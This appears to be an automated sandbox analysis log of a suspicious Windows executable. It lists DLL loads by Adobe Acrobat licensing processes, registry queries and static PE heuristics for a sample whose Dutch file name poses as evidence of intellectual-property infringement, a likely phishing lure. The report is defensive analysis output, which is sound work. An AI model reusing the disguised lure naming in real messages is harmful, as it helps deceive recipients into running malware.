Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dataexchange.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: twinapi.appcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: twinapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: atlthunk.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: directmanipulation.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: cryptnet.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: libcef.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dbghelp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: winmm.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: propsys.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uiautomationcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: oleacc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: secur32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: userenv.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: hid.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: chrome_elf.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: version.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwrite.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: usp10.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: d3d9.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxva2.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wevtapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cryptui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: credui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wininet.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: esent.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dsrole.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wkscli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: samcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: directxdatabasehelper.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: mf.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: mfplat.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cfgmgr32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: rtworkq.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: mfperfhelper.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: msvproc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: libcef.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dbghelp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: winmm.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: propsys.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uiautomationcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: oleacc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: secur32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: userenv.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: hid.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: chrome_elf.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: version.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwrite.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: usp10.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: d3d9.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxva2.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wevtapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cryptui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: credui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wininet.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: esent.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dsrole.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wkscli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: samcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: nlansp_c.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: libcef.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dbghelp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: winmm.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: propsys.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uiautomationcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: oleacc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: secur32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: userenv.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: hid.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: chrome_elf.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: version.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwrite.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: usp10.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: d3d9.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxva2.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wevtapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cryptui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: credui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wininet.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: esent.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dsrole.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wkscli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: samcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: libcef.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dbghelp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: winmm.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: propsys.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uiautomationcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: oleacc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: secur32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: userenv.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: hid.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: chrome_elf.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: version.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwrite.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: usp10.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: d3d9.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Section loaded: dxva2.dll

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Uses Rich Edit Controls

Source: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\PDFMaker.OfficeAddin

PE / OLE file has a valid certificate

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: certificate valid

PE file has a big code size

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Submission file is bigger than most known malware samples

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static file information: File size 6365288 > 1048576

PE file contains a mix of resources often seen in goodware

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_CURSOR
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Static PE information: section name: RT_BITMAP
